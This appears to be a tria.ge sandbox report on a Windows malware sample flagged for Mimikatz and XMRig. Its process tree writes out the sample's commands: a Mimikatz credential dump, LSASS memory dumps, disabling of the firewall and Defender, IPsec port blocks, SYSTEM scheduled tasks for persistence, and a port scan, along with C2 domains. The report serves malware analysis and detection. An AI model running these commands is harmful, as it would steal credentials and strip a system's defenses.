Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    120s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
  • submitted
    15/10/2024, 02:14 UTC

General

  • Target

    bea313368ef8063b923d61a3e152b85375b32c4b21cc5dd0f8e68344ebd7d636N.exe

  • Size

    7.6MB

  • MD5

    9b1817a2ee30bbbce35c481b8afa4960

  • SHA1

    fec68058190c48b15e3edc07ab9a888387913e1d

  • SHA256

    bea313368ef8063b923d61a3e152b85375b32c4b21cc5dd0f8e68344ebd7d636

  • SHA512

    32dcf046626cc9b211a69eec6eaa672173d6ce723a53be23631796c747a4279c569a73d4019a74fedb9d9cb3428f911b06fb2b6556f7a30e0d8f2ddd4dbb9e6d

  • SSDEEP

    196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Reads credential material from the memory of the LSASS process.

  • XMRig Miner payload 6 IoCs
  • mimikatz is an open source tool to dump credentials on Windows. 8 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 17 IoCs
  • Loads dropped DLL 24 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Network Share Discovery 1 TTPs

    Attempts to enumerate folders and drives shared on the host or the network.

  • Creates a Windows Service
  • Drops file in System32 directory 8 IoCs
  • UPX packed file 28 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 57 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 31 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:768
      • C:\Windows\TEMP\tckjwhyci\aktvci.exe
        "C:\Windows\TEMP\tckjwhyci\aktvci.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1716
    • C:\Users\Admin\AppData\Local\Temp\bea313368ef8063b923d61a3e152b85375b32c4b21cc5dd0f8e68344ebd7d636N.exe
      "C:\Users\Admin\AppData\Local\Temp\bea313368ef8063b923d61a3e152b85375b32c4b21cc5dd0f8e68344ebd7d636N.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2488
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\rtldfmcc\nihkvnz.exe
        2⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:2864
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2880
        • C:\Windows\rtldfmcc\nihkvnz.exe
          C:\Windows\rtldfmcc\nihkvnz.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:3036
    • C:\Windows\rtldfmcc\nihkvnz.exe
      C:\Windows\rtldfmcc\nihkvnz.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2776
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3040
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:636
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
          3⤵
            PID:2792
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2884
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2992
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2756
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2784
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static del all
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • Modifies data under HKEY_USERS
          PID:1996
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add policy name=Bastards description=FuckingBastards
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          • Modifies data under HKEY_USERS
          PID:2324
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add filteraction name=BastardsList action=block
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          • Modifies data under HKEY_USERS
          PID:2268
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c C:\Windows\ypbgnfgfn\livcfcfiu\wpcap.exe /S
          2⤵
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1656
          • C:\Windows\ypbgnfgfn\livcfcfiu\wpcap.exe
            C:\Windows\ypbgnfgfn\livcfcfiu\wpcap.exe /S
            3⤵
            • Drops file in Drivers directory
            • Executes dropped EXE
            • Loads dropped DLL
            • Drops file in System32 directory
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:944
            • C:\Windows\SysWOW64\net.exe
              net stop "Boundary Meter"
              4⤵
                PID:2336
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "Boundary Meter"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:1712
              • C:\Windows\SysWOW64\net.exe
                net stop "TrueSight Meter"
                4⤵
                • System Location Discovery: System Language Discovery
                PID:792
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "TrueSight Meter"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:548
              • C:\Windows\SysWOW64\net.exe
                net stop npf
                4⤵
                • System Location Discovery: System Language Discovery
                PID:2372
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop npf
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:2164
              • C:\Windows\SysWOW64\net.exe
                net start npf
                4⤵
                  PID:2236
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:2468
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c net start npf
              2⤵
                PID:2200
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:2128
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:864
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c net start npf
                2⤵
                • System Location Discovery: System Language Discovery
                PID:2768
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:1104
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:1684
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c C:\Windows\ypbgnfgfn\livcfcfiu\rjfiekzcc.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ypbgnfgfn\livcfcfiu\Scant.txt
                2⤵
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:2204
                • C:\Windows\ypbgnfgfn\livcfcfiu\rjfiekzcc.exe
                  C:\Windows\ypbgnfgfn\livcfcfiu\rjfiekzcc.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ypbgnfgfn\livcfcfiu\Scant.txt
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:2228
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c C:\Windows\ypbgnfgfn\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\ypbgnfgfn\Corporate\log.txt
                2⤵
                • Loads dropped DLL
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                PID:940
                • C:\Windows\ypbgnfgfn\Corporate\vfshost.exe
                  C:\Windows\ypbgnfgfn\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1616
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "btldecrcl" /ru system /tr "cmd /c C:\Windows\ime\nihkvnz.exe"
                2⤵
                • System Location Discovery: System Language Discovery
                PID:1236
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:2244
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /sc minute /mo 1 /tn "btldecrcl" /ru system /tr "cmd /c C:\Windows\ime\nihkvnz.exe"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:2916
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "fmullgzie" /ru system /tr "cmd /c echo Y|cacls C:\Windows\rtldfmcc\nihkvnz.exe /p everyone:F"
                2⤵
                  PID:1580
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:568
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /sc minute /mo 1 /tn "fmullgzie" /ru system /tr "cmd /c echo Y|cacls C:\Windows\rtldfmcc\nihkvnz.exe /p everyone:F"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:2972
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "hyigybsnt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\tckjwhyci\aktvci.exe /p everyone:F"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:2620
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:2396
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /sc minute /mo 1 /tn "hyigybsnt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\tckjwhyci\aktvci.exe /p everyone:F"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:3012
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  • Modifies data under HKEY_USERS
                  PID:2076
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  • Modifies data under HKEY_USERS
                  PID:2992
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • Modifies data under HKEY_USERS
                  PID:2032
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  • Modifies data under HKEY_USERS
                  PID:928
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  • Modifies data under HKEY_USERS
                  PID:2740
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  • Modifies data under HKEY_USERS
                  PID:1996
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • Modifies data under HKEY_USERS
                  PID:2324
                • C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe
                  C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe -accepteula -mp 768 C:\Windows\TEMP\ypbgnfgfn\768.dmp
                  2⤵
                  • Executes dropped EXE
                  • Modifies data under HKEY_USERS
                  • Suspicious use of AdjustPrivilegeToken
                  PID:572
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  • Modifies data under HKEY_USERS
                  PID:1276
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  • Modifies data under HKEY_USERS
                  PID:2300
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  • Modifies data under HKEY_USERS
                  PID:580
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  • Modifies data under HKEY_USERS
                  PID:1768
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • Modifies data under HKEY_USERS
                  PID:2504
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net stop SharedAccess
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:2256
                  • C:\Windows\SysWOW64\net.exe
                    net stop SharedAccess
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:1876
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop SharedAccess
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:2492
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c netsh firewall set opmode mode=disable
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:2220
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh firewall set opmode mode=disable
                    3⤵
                    • Modifies Windows Firewall
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    • Modifies data under HKEY_USERS
                    PID:892
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c netsh Advfirewall set allprofiles state off
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:1984
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh Advfirewall set allprofiles state off
                    3⤵
                    • Modifies Windows Firewall
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    • Modifies data under HKEY_USERS
                    PID:864
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net stop MpsSvc
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:2064
                  • C:\Windows\SysWOW64\net.exe
                    net stop MpsSvc
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:2588
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop MpsSvc
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:2596
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net stop WinDefend
                  2⤵
                    PID:2460
                    • C:\Windows\SysWOW64\net.exe
                      net stop WinDefend
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:816
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop WinDefend
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:1764
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop wuauserv
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:1384
                    • C:\Windows\SysWOW64\net.exe
                      net stop wuauserv
                      3⤵
                        PID:1028
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop wuauserv
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:1736
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c sc config MpsSvc start= disabled
                      2⤵
                        PID:1508
                        • C:\Windows\SysWOW64\sc.exe
                          sc config MpsSvc start= disabled
                          3⤵
                          • Launches sc.exe
                          • System Location Discovery: System Language Discovery
                          PID:1328
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c sc config SharedAccess start= disabled
                        2⤵
                          PID:2132
                          • C:\Windows\SysWOW64\sc.exe
                            sc config SharedAccess start= disabled
                            3⤵
                            • Launches sc.exe
                            • System Location Discovery: System Language Discovery
                            PID:804
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c sc config WinDefend start= disabled
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:2724
                          • C:\Windows\SysWOW64\sc.exe
                            sc config WinDefend start= disabled
                            3⤵
                            • Launches sc.exe
                            • System Location Discovery: System Language Discovery
                            PID:1592
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c sc config wuauserv start= disabled
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:1496
                          • C:\Windows\SysWOW64\sc.exe
                            sc config wuauserv start= disabled
                            3⤵
                            • Launches sc.exe
                            PID:1064
                        • C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe
                          C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe -accepteula -mp 1124 C:\Windows\TEMP\ypbgnfgfn\1124.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2912
                        • C:\Windows\TEMP\xohudmc.exe
                          C:\Windows\TEMP\xohudmc.exe
                          2⤵
                          • Executes dropped EXE
                          • Drops file in System32 directory
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of SetWindowsHookEx
                          PID:2612
                        • C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe
                          C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe -accepteula -mp 1180 C:\Windows\TEMP\ypbgnfgfn\1180.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2876
                        • C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe
                          C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe -accepteula -mp 1312 C:\Windows\TEMP\ypbgnfgfn\1312.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2820
                        • C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe
                          C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe -accepteula -mp 1560 C:\Windows\TEMP\ypbgnfgfn\1560.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1856
                        • C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe
                          C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe -accepteula -mp 1584 C:\Windows\TEMP\ypbgnfgfn\1584.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1564
                        • C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe
                          C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe -accepteula -mp 2680 C:\Windows\TEMP\ypbgnfgfn\2680.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2000
                        • C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe
                          C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe -accepteula -mp 2692 C:\Windows\TEMP\ypbgnfgfn\2692.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:284
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
                        1⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2364
                      • C:\Windows\SysWOW64\huzbiq.exe
                        C:\Windows\SysWOW64\huzbiq.exe
                        1⤵
                        • Executes dropped EXE
                        • Suspicious use of SetWindowsHookEx
                        PID:2756
                      • C:\Windows\system32\taskeng.exe
                        taskeng.exe {7992D409-5805-4FE5-9E67-78F88167473F} S-1-5-18:NT AUTHORITY\System:Service:
                        1⤵
                          PID:2400
                          • C:\Windows\system32\cmd.EXE
                            C:\Windows\system32\cmd.EXE /c C:\Windows\ime\nihkvnz.exe
                            2⤵
                              PID:2360
                              • C:\Windows\ime\nihkvnz.exe
                                C:\Windows\ime\nihkvnz.exe
                                3⤵
                                • Executes dropped EXE
                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                • Suspicious use of SetWindowsHookEx
                                PID:2188
                            • C:\Windows\system32\cmd.EXE
                              C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\rtldfmcc\nihkvnz.exe /p everyone:F
                              2⤵
                                PID:976
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                  3⤵
                                    PID:2768
                                  • C:\Windows\system32\cacls.exe
                                    cacls C:\Windows\rtldfmcc\nihkvnz.exe /p everyone:F
                                    3⤵
                                      PID:1684
                                  • C:\Windows\system32\cmd.EXE
                                    C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\tckjwhyci\aktvci.exe /p everyone:F
                                    2⤵
                                      PID:1944
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                        3⤵
                                          PID:904
                                        • C:\Windows\system32\cacls.exe
                                          cacls C:\Windows\TEMP\tckjwhyci\aktvci.exe /p everyone:F
                                          3⤵
                                            PID:1208

                                      Network

                                      • flag-us
                                        DNS
                                        uio.hognoob.se
                                        nihkvnz.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        uio.hognoob.se
                                        IN A
                                        Response
                                      • flag-us
                                        DNS
                                        uio.heroherohero.info
                                        nihkvnz.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        uio.heroherohero.info
                                        IN A
                                        Response
                                        uio.heroherohero.info
                                        IN A
                                        43.240.239.76
                                      • flag-us
                                        DNS
                                        yxw.hognoob.se
                                        nihkvnz.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        yxw.hognoob.se
                                        IN A
                                        Response
                                      • flag-us
                                        DNS
                                        2019.ip138.com
                                        nihkvnz.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        2019.ip138.com
                                        IN A
                                        Response
                                        2019.ip138.com
                                        IN CNAME
                                        waf.ip138.com
                                        waf.ip138.com
                                        IN A
                                        110.81.155.138
                                        waf.ip138.com
                                        IN A
                                        59.57.14.11
                                        waf.ip138.com
                                        IN A
                                        59.57.13.133
                                        waf.ip138.com
                                        IN A
                                        110.81.155.137
                                        waf.ip138.com
                                        IN A
                                        59.57.13.182
                                      • flag-us
                                        DNS
                                        pxi.hognoob.se
                                        aktvci.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        pxi.hognoob.se
                                        IN A
                                        Response
                                      • flag-us
                                        DNS
                                        haq.hognoob.se
                                        huzbiq.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        haq.hognoob.se
                                        IN A
                                        Response
                                      • flag-us
                                        DNS
                                        pxx.hognoob.se
                                        aktvci.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        pxx.hognoob.se
                                        IN A
                                        Response
                                      • 43.240.239.76:63145
                                        uio.heroherohero.info
                                        nihkvnz.exe
                                        152 B
                                        3
                                      • 110.81.155.138:80
                                        2019.ip138.com
                                        nihkvnz.exe
                                        152 B
                                        3
                                      • 59.57.14.11:80
                                        2019.ip138.com
                                        nihkvnz.exe
                                        152 B
                                        3
                                      • 59.57.13.133:80
                                        2019.ip138.com
                                        nihkvnz.exe
                                        152 B
                                        3
                                      • 8.8.8.8:53
                                        uio.hognoob.se
                                        dns
                                        nihkvnz.exe
                                        60 B
                                        136 B
                                        1
                                        1

                                        DNS Request

                                        uio.hognoob.se

                                      • 8.8.8.8:53
                                        uio.heroherohero.info
                                        dns
                                        nihkvnz.exe
                                        67 B
                                        83 B
                                        1
                                        1

                                        DNS Request

                                        uio.heroherohero.info

                                        DNS Response

                                        43.240.239.76

                                      • 8.8.8.8:53
                                        yxw.hognoob.se
                                        dns
                                        nihkvnz.exe
                                        60 B
                                        136 B
                                        1
                                        1

                                        DNS Request

                                        yxw.hognoob.se

                                      • 8.8.8.8:53
                                        2019.ip138.com
                                        dns
                                        nihkvnz.exe
                                        60 B
                                        158 B
                                        1
                                        1

                                        DNS Request

                                        2019.ip138.com

                                        DNS Response

                                        110.81.155.138
                                        59.57.14.11
                                        59.57.13.133
                                        110.81.155.137
                                        59.57.13.182

                                      • 8.8.8.8:53
                                        pxi.hognoob.se
                                        dns
                                        aktvci.exe
                                        60 B
                                        136 B
                                        1
                                        1

                                        DNS Request

                                        pxi.hognoob.se

                                      • 8.8.8.8:53
                                        haq.hognoob.se
                                        dns
                                        huzbiq.exe
                                        60 B
                                        136 B
                                        1
                                        1

                                        DNS Request

                                        haq.hognoob.se

                                      • 8.8.8.8:53
                                        pxx.hognoob.se
                                        dns
                                        aktvci.exe
                                        60 B
                                        136 B
                                        1
                                        1

                                        DNS Request

                                        pxx.hognoob.se

                                      MITRE ATT&CK Enterprise v15

                                      Downloads

                                      • C:\Windows\SysWOW64\Packet.dll

                                        Filesize

                                        95KB

                                        MD5

                                        86316be34481c1ed5b792169312673fd

                                        SHA1

                                        6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

                                        SHA256

                                        49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

                                        SHA512

